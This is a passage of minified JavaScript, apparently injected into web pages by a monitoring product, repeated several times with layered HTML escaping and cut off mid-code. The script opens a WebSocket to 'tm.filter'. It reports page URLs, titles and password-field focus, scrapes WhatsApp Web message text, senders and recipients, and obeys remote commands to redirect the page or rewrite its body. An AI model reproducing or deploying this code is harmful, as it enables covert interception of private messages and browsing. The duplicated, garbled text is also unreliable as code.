YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function f(){(I=new WebSocket(S.connectionString)).onclose=o,I.onmessage=s,I.onopen=d,S.extJs&&(this.extJs.webSockReady=()=&gt;I.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=&gt;I.send(Y))}function g(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e&lt;Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&&document[Y]}function p(){var Y=document.head.querySelector("[name='og:title']");return!!Y&&"WhatsApp Web"===Y.getAttribute("content")}function h(){I.send(JSON.stringify({type:"waptracking"}))}function m(){E=new Map,w=new Set,L=0,(k=new Date).setSeconds(0),k.setMilliseconds(0)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11&lt;Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return this.dd[Y.getDay()]},Z:function(Y){return(0&lt;(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,i=Y.length;a&lt;i;a++)t=Y[a],!e.indexOf(t)&&t.length&gt;r&&(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),i=t.en,o=i.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=o[Y];return e?o.post(e.call(i,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,i,o=t.en,s=o.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,D={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var d=0,l=1;for(i="";!i;)i=a[++d];a=i.charAt(0);var f=s.slice(M);if(2&gt;d){var g=o.parser[i].call(o,f,n);c[a]=g.index,"M"===a&&c[a]++,l=g.length}else if(7&gt;d)g=(f.match(D[d])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-i.length):g),l=g.length;else if(" "!==a&&a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===s.length&&g?(c.Y+=70&gt;c.Y?2e3:100&gt;c.Y?1900:0,c.H=c.H||o.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1&gt;c.M||12&lt;c.M||1&gt;c.D||c.D&gt;Y[c.M-1]||23&lt;c.H||59&lt;c.m||59&lt;c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&&Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var S={token:"2951283c-6089-40af-b355-5e1462c0076e",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"15604",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},v=6e4,y=null,N=null,b=null,A=null,T=!1,E=null,w=null,L=0,k=null,I=null,C="",H=!1;!function Y(e){g()?setTimeout((function(){Y(e)}),1e3):e()}((function(){S.extJs&&S.extJs.init(S.token),n()&&window.addEventListener("focus",r),(n()||S.extJs)&&l()}))}();&#xD;&#xD; &#xD;&#xD; &#xD; &#xD; &#xD; &#xD;&#xD; &#xD;&#xD; &#xD;&#xD;&#xD; &#xD;&#xD;&#xD; !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:S.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:S.pid,pn:S.pn};null!=I&amp;&amp;I.readyState==WebSocket.OPEN&amp;&amp;I.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:S.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:S.sendNotificationsInterval,useragent:navigator.appVersion.length&gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:S.pid,pn:S.pn};I.send(JSON.stringify(Y))}function i(){h()}function o(){n()&amp;&amp;(clearInterval(y),clearInterval(N)),timeout=setTimeout((function(){f()}),v)}function s(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();T!=e&amp;&amp;e&amp;&amp;m(),T=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&amp;&amp;"password"==Y.type&amp;&amp;!H){H=!0;var e={type:"password_input_focus",focus:!0,token:S.token};I.send(JSON.stringify(e))}}function D(Y){if(Y&amp;&amp;"password"==Y.type&amp;&amp;H){H=!1;var e={type:"password_input_focus",focus:!1,token:S.token};I.send(JSON.stringify(e))}}function c(Y){var e=document.activeElement;e&amp;&amp;e!=document.body?document.querySelector&amp;&amp;(e=document.querySelector(":focus")):e=null;for(var t=0;t&lt;Y.length;++t){let i=Y[t];var n="password"==i.type,r=n&amp;&amp;i.hasAttribute("autofocus"),a=n&amp;&amp;e&amp;&amp;i.isEqualNode(e);(r||a)&amp;&amp;u(),i.onfocus=function(){u(i)},i.onblur=function(){D(i)}}}function d(){n()&amp;&amp;(S.iup&amp;&amp;r(),p()&amp;&amp;(m(),h(),function(){var Y=new MutationObserver((function(Y){Y&amp;&amp;Y.forEach((function(Y){Y&amp;&amp;("childList"!==Y.type||Y.addedNodes.length&lt;=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&amp;&amp;(b=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&amp;&amp;(A="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&amp;&amp;(A="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&amp;&amp;(t=Array.prototype.slice.call(t)).push(Y),t&amp;&amp;t.forEach((function(Y){if(Y&amp;&amp;Y.classList&amp;&amp;!(Y.classList.length&lt;=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&amp;&amp;t.attributes["data-pre-plain-text"]){var i=t.attributes["data-pre-plain-text"].textContent,o=/\[(\d{1,2}):(\d{1,2})[ ]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](i);if(!o||6!=o.length)return;if(o[3]&amp;&amp;"pm"==o[3].toLowerCase()&amp;&amp;(o[1]=parseInt(o[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](o[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(o[4],C)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var i=Date.parse(n[a]);if(i&amp;&amp;!(Math.abs(r-i)&gt;1728e6))return new Date(i)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(o[1]),r.setMinutes(o[2]),a=o[5]}E.get(b)||E.set(b,k);var s=n?n.innerText:null;if(a&amp;&amp;s&amp;&amp;T){var M=(a+s+b+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y&lt;&lt;7)+(Y&lt;&lt;3))^e})).toString(16);if(E.get(b).getTime()==r.getTime()?r.setMilliseconds(++L):(L=0,E.set(b,r)),!M||w.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:s,recipient:e?"Me":b,conversationId:b+"("+A+")"};I.send(JSON.stringify(u)),w.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&amp;&amp;(a(),y=setInterval(a,S.sendNotificationsInterval),p()&amp;&amp;(N=setInterval(i,S.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t&lt;e.length;++t)"icon"!=e[t].getAttribute("rel")&amp;&amp;"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&amp;&amp;(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=S.token,n.useragent=navigator.appVersion.length&gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,I.send(JSON.stringify(n))}(),S.dontTrackWebPasswords&amp;&amp;(c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&amp;&amp;Y.forEach((function(Y){Y&amp;&amp;Y.addedNodes&amp;&amp;0!=Y.addedNodes.length&amp;&amp;(window.NodeList&amp;&amp;!NodeList.prototype.forEach&amp;&amp;(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&amp;&amp;c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.onbeforeunload=D))}function l(){document.tmfilter||(f(),C={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function f(){(I=new WebSocket(S.connectionString)).onclose=o,I.onmessage=s,I.onopen=d,S.extJs&amp;&amp;(this.extJs.webSockReady=()=&gt;I.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=&gt;I.send(Y))}function g(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e&lt;Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&amp;&amp;document[Y]}function p(){var Y=document.head.querySelector("[name='og:title']");return!!Y&amp;&amp;"WhatsApp Web"===Y.getAttribute("content")}function h(){I.send(JSON.stringify({type:"waptracking"}))}function m(){E=new Map,w=new Set,L=0,(k=new Date).setSeconds(0),k.setMilliseconds(0)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11&lt;Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return this.dd[Y.getDay()]},Z:function(Y){return(0&lt;(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,i=Y.length;a&lt;i;a++)t=Y[a],!e.indexOf(t)&amp;&amp;t.length&gt;r&amp;&amp;(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),i=t.en,o=i.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=o[Y];return e?o.post(e.call(i,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,i,o=t.en,s=o.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,D={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var d=0,l=1;for(i="";!i;)i=a[++d];a=i.charAt(0);var f=s.slice(M);if(2&gt;d){var g=o.parser[i].call(o,f,n);c[a]=g.index,"M"===a&amp;&amp;c[a]++,l=g.length}else if(7&gt;d)g=(f.match(D[d])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-i.length):g),l=g.length;else if(" "!==a&amp;&amp;a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===s.length&amp;&amp;g?(c.Y+=70&gt;c.Y?2e3:100&gt;c.Y?1900:0,c.H=c.H||o.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1&gt;c.M||12&lt;c.M||1&gt;c.D||c.D&gt;Y[c.M-1]||23&lt;c.H||59&lt;c.m||59&lt;c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&amp;&amp;Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var S={token:"83fdfd3b-ce3d-4de6-8d8c-49a694e97d99",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"15604",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},v=6e4,y=null,N=null,b=null,A=null,T=!1,E=null,w=null,L=0,k=null,I=null,C="",H=!1;!function Y(e){g()?setTimeout((function(){Y(e)}),1e3):e()}((function(){S.extJs&amp;&amp;S.extJs.init(S.token),n()&amp;&amp;window.addEventListener("focus",r),(n()||S.extJs)&amp;&amp;l()}))}();&#xD;&#xD;&#xD; &#xD;&#xD;&#xD; &#xD;&#xD; &#xD; &#xD; &#xD; &#xD;&#xD; &#xD;&#xD; &#xD;&#xD;&#xD; &#xD;&#xD;&#xD; &amp;#xD;&#xD;&#xD;&#xD; &amp;#xD;&#xD;&#xD;&#xD; !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:S.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:S.pid,pn:S.pn};null!=I&amp;amp;&amp;amp;I.readyState==WebSocket.OPEN&amp;amp;&amp;amp;I.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:S.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:S.sendNotificationsInterval,useragent:navigator.appVersion.length&amp;gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:S.pid,pn:S.pn};I.send(JSON.stringify(Y))}function i(){h()}function o(){n()&amp;amp;&amp;amp;(clearInterval(y),clearInterval(N)),timeout=setTimeout((function(){f()}),v)}function s(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();T!=e&amp;amp;&amp;amp;e&amp;amp;&amp;amp;m(),T=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&amp;amp;&amp;amp;"password"==Y.type&amp;amp;&amp;amp;!H){H=!0;var e={type:"password_input_focus",focus:!0,token:S.token};I.send(JSON.stringify(e))}}function D(Y){if(Y&amp;amp;&amp;amp;"password"==Y.type&amp;amp;&amp;amp;H){H=!1;var e={type:"password_input_focus",focus:!1,token:S.token};I.send(JSON.stringify(e))}}function c(Y){var e=document.activeElement;e&amp;amp;&amp;amp;e!=document.body?document.querySelector&amp;amp;&amp;amp;(e=document.querySelector(":focus")):e=null;for(var t=0;t&amp;lt;Y.length;++t){let i=Y[t];var n="password"==i.type,r=n&amp;amp;&amp;amp;i.hasAttribute("autofocus"),a=n&amp;amp;&amp;amp;e&amp;amp;&amp;amp;i.isEqualNode(e);(r||a)&amp;amp;&amp;amp;u(),i.onfocus=function(){u(i)},i.onblur=function(){D(i)}}}function d(){n()&amp;amp;&amp;amp;(S.iup&amp;amp;&amp;amp;r(),p()&amp;amp;&amp;amp;(m(),h(),function(){var Y=new MutationObserver((function(Y){Y&amp;amp;&amp;amp;Y.forEach((function(Y){Y&amp;amp;&amp;amp;("childList"!==Y.type||Y.addedNodes.length&amp;lt;=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&amp;amp;&amp;amp;(b=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&amp;amp;&amp;amp;(A="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&amp;amp;&amp;amp;(A="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&amp;amp;&amp;amp;(t=Array.prototype.slice.call(t)).push(Y),t&amp;amp;&amp;amp;t.forEach((function(Y){if(Y&amp;amp;&amp;amp;Y.classList&amp;amp;&amp;amp;!(Y.classList.length&amp;lt;=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&amp;amp;&amp;amp;t.attributes["data-pre-plain-text"]){var i=t.attributes["data-pre-plain-text"].textContent,o=/\[(\d{1,2}):(\d{1,2})[ 